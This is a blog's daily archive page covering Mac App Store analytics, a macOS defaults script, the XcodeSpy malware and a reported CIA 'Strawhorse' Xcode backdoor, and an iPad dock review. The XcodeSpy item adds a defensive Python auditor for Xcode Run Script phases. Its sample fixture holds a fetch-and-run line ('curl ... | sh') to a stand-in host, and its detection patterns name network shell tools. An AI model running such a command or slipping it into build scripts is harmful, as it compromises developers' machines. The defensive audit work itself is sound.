Archive for March 19, 2021

Friday, March 19, 2021

Mac Analytics on App Store Connect


App Analytics now provides usage metrics for Mac apps, including data on installations, sessions, active devices, crashes, and deletions. And now you can measure user retention to see how often users return to your app after downloading it.

Note that these are just the basic app lifecycle metrics. MetricKit is still iOS-only.


Setting macOS Defaults via Script

Hacker News is calling this Bash script by Mathias Bynens “Sensible macOS Defaults.” I don’t agree that these are necessarily the particular settings anyone should use, but I endorse the idea of collecting the preferences that one frequently modifies (system and otherwise) into a script. This one has some good examples of how that can be done and also illustrates some settings that are hidden.


XcodeSpy Malware

Phil Stokes (via Patrick Wardle, MacRumors):

Threat actors are abusing the Run Script feature in Apple’s Xcode IDE to infect unsuspecting Apple Developers via shared Xcode Projects.

XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism.

The backdoor has functionality for recording the victim’s microphone, camera and keyboard, as well as the ability to upload and download files.


The sample we analyzed used a copy of a legitimate open-source project that can be found on GitHub called TabBarInteraction.

Jonathan Zdziarski (in 2015, via mikey):

Early this morning, The Intercept posted several documents pertaining to CIA’s research into compromising iOS devices (along with other things) through Sandia National Laboratories, a major research and development contractor to the government. The documents outlined a number of project talks taking place at a closed government conference referred to as the Jamboree in 2012.


Strawhorse, a malicious implementation of Xcode, where App Store developers (likely not suspected of any crimes) would be targeted, and their dev machines backdoored to give CIA injection capabilities into compiled applications. The malicious Xcode variant was capable of stealing the developer’s private codesign keys, which would be smuggled out with compiled binaries. It would also disable securityd so that it would not warn the developer that this was happening. The stolen keys could later be used to inject and sign payloads into the developer’s own products without their permission or knowledge, which could then be widely disseminated through the App Store channels. This could include trojans or watermarks, as the document suggests. With the developer keys extracted, binary modifications could also be made at a later time, if such an injection framework existed.

In spite of what The Intercept wrote, there is no evidence that Strawhorse was slated for use en masse, or that it even reached an operational phase.
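
One way to review the Run Script phases of a shared Xcode project before building it, as an added example that is not from any of the quoted posts. The review patterns and the sample project fragment are assumptions constructed for illustration, not indicators taken from the XcodeSpy sample.

```python
import re

# Quoted shellScript value in a project.pbxproj (OpenStep-style plist text).
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
ESCAPES = {"n": "\n", "t": "\t"}  # any other escaped char maps to itself

# Review heuristics assumed for this example; they are not XcodeSpy indicators.
REVIEW_PATTERNS = {
    "network fetch": re.compile(r"\b(curl|wget|nc)\b"),
    "raw TCP redirect": re.compile(r"/dev/tcp/"),
    "decode-and-run": re.compile(r"base64\s+(-d|-D|--decode)|\beval\b"),
    "persistence path": re.compile(r"Launch(Agents|Daemons)"),
}

# Constructed sample: two Run Script phases as Xcode serializes them.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* Banner */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo \"Building ${PRODUCT_NAME}\"\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/x | sh >/dev/null 2>&1 &\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

def unescape(raw):
    """Undo the backslash escapes Xcode applies to the stored script."""
    return re.sub(r"\\(.)", lambda m: ESCAPES.get(m.group(1), m.group(1)), raw, flags=re.S)

def audit_pbxproj(text):
    """Return [(script, [reasons])] for every Run Script phase found in text."""
    findings = []
    for match in SCRIPT_RE.finditer(text):
        script = unescape(match.group(1))
        reasons = [name for name, rx in REVIEW_PATTERNS.items() if rx.search(script)]
        findings.append((script, reasons))
    return findings

if __name__ == "__main__":
    for script, reasons in audit_pbxproj(SAMPLE_PBXPROJ):
        print("REVIEW" if reasons else "ok    ", reasons, repr(script))
```

To check a real project, pass the contents of its .xcodeproj/project.pbxproj file to audit_pbxproj and read every listed script before opening the project in Xcode; an empty reasons list only means none of these heuristics matched.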


Kensington StudioDock for iPad

Federico Viticci:

I’ve spent the past 24 hours testing Kensington’s long-anticipated StudioDock, a $400 docking station that aims to turn the iPad Pro into a desktop workstation with support for display rotation, expansion via USB-C, USB-A, and SD card slots, and integrated Qi charging for iPhone and AirPods. And just like last year, I find myself torn between appreciating the potential of this product and concerned about its timing given rumors of an impending iPad Pro refresh just around the corner.


The StudioDock is a stand that lets you dock the iPad at your desk by attaching it to a magnetic panel that can be rotated to landscape or portrait mode and tilted from 0 to 120 degrees to adjust its viewing angle. Visually, the StudioDock looks like a “mini iMac” where the iPad Pro becomes the display and the “foot” of the stand has a built-in Qi charging pad split into two areas for iPhones and AirPods (or any other device that supports wireless charging and fits on the pad). What makes the StudioDock unique – and, arguably, explains its price – is that, in addition to Qi charging, the stand itself packs a variety of ports to extend the iPad Pro’s I/O options.